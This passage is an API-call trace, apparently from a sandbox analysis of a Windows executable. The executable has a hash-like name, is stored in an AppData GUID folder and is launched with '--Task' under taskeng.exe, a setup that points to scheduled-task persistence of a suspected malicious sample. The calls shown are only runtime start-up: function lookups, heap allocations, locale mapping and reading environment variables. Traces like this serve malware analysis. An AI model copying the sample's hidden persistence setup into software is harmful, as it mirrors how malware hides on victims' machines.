GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0103.242] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3bc) returned 0x6cf820 [0103.242] GetCurrentThreadId () returned 0xb54 [0103.247] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6b3838 [0103.248] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x800) returned 0x6cfbe8 [0103.248] GetStartupInfoW (in: lpStartupInfo=0x18f768 | out: lpStartupInfo=0x18f768*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xc2c04f6, hStdError=0x44)) [0103.248] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0103.248] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.248] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task" [0103.248] GetEnvironmentStringsW () returned 0x6d03f0* [0103.248] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xaca) returned 0x6d0ec8 [0103.282] FreeEnvironmentStringsW (penv=0x6d03f0) returned 1 [0103.288] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1bc) returned 0x6d19a0 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x98) returned 0x6d1b68 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3e) returned 0x6c5b10 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x6c) returned 0x6d1c08 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x6e) returned 0x6d1c80 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x78) returned 0x6c1cc8 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x62) returned 0x6d1cf8 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2e) returned 0x6cb400 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x48) returned 0x6c6fb8 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x28) returned 0x6cadf8 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1a) returned 0x6cf5d8 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4a) returned 0x6d1d68 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x72) returned 0x6c1d48 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x30) returned 0x6cb438 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2e) returned 0x6cb470 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6cf600 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xd2) returned 0x6d1dc0 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x7c) returned 0x6d1ea0 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x36) returned 0x6d1f28 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3a) returned 0x6c5b58 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x90) returned 0x6d03f0 [0103.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x24) returned 0x6cae28 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x30) returned 0x6cb4a8 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x36) returned 0x6d1f68 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x48) returned 0x6c7008 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x52) returned 0x6d0488 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3c) returned 0x6c5ba0 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x82) returned 0x6d04e8 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2e) returned 0x6cb4e0 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1e) returned 0x6cf628 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2c) returned 0x6cb518 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x54) returned 0x6d0578 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x52) returned 0x6d05d8 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2a) returned 0x6cb550 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3c) returned 0x6c5be8 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x54) returned 0x6d0638 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x24) returned 0x6cae58 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x30) returned 0x6cb588 [0103.289] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x8c) returned 0x6d0698 [0103.289] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d0ec8 | out: hHeap=0x6b0000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x800) returned 0x6d0730 [0103.362] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x80) returned 0x6d0f38 [0103.393] GetLastError () returned 0x0 [0103.393] IsValidCodePage (CodePage=0x4e4) returned 1 [0103.393] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f75c | out: lpCPInfo=0x18f75c) returned 1 [0103.399] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f224 | out: lpCPInfo=0x18f224) returned 1 [0103.404] GetLastError () returned 0x0 [0103.410] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0103.424] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0103.424] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f538, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x06\x04,\x0ct÷\x18", lpUsedDefaultChar=0x0) returned 256 [0103.424] GetLastError () returned 0x0 [0103.424] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0103.424] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0103.424] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f438, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x06\x04,\x0ct÷\x18", lpUsedDefaultChar=0x0) returned 256 [0103.430] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0103.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4037ad [0103.459] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6d0f38) returned 0x80 [0103.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.471] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1f) returned 0x6cf650 [0103.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x6cf650, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0103.482] GetLastError () returned 0x0 [0103.482] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0x8) returned 0x6d1fa8 [0103.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0103.482] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x36) returned 0x6d11e8 [0103.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6d11e8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0103.482] GetLastError () returned 0x0 [0103.488] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0xc) returned 0x6d1fa8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x37) returned 0x6d1228 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6d1228, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0x10) returned 0x6d1fa8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3c) returned 0x6c5c30 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6c5c30, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0x14) returned 0x6d1fa8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x31) returned 0x6d1268 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6d1268, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0x18) returned 0x6d1fa8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x17) returned 0x6d1fc8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6d1fc8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1fa8, Size=0x1c) returned 0x6d12a8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x24) returned 0x6cae88 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x6cae88, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x20) returned 0x6d12a8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x14) returned 0x6d1fa8 [0103.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x6d1fa8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0103.489] GetLastError () returned 0x0 [0103.489] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x24) returned 0x6d12a8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 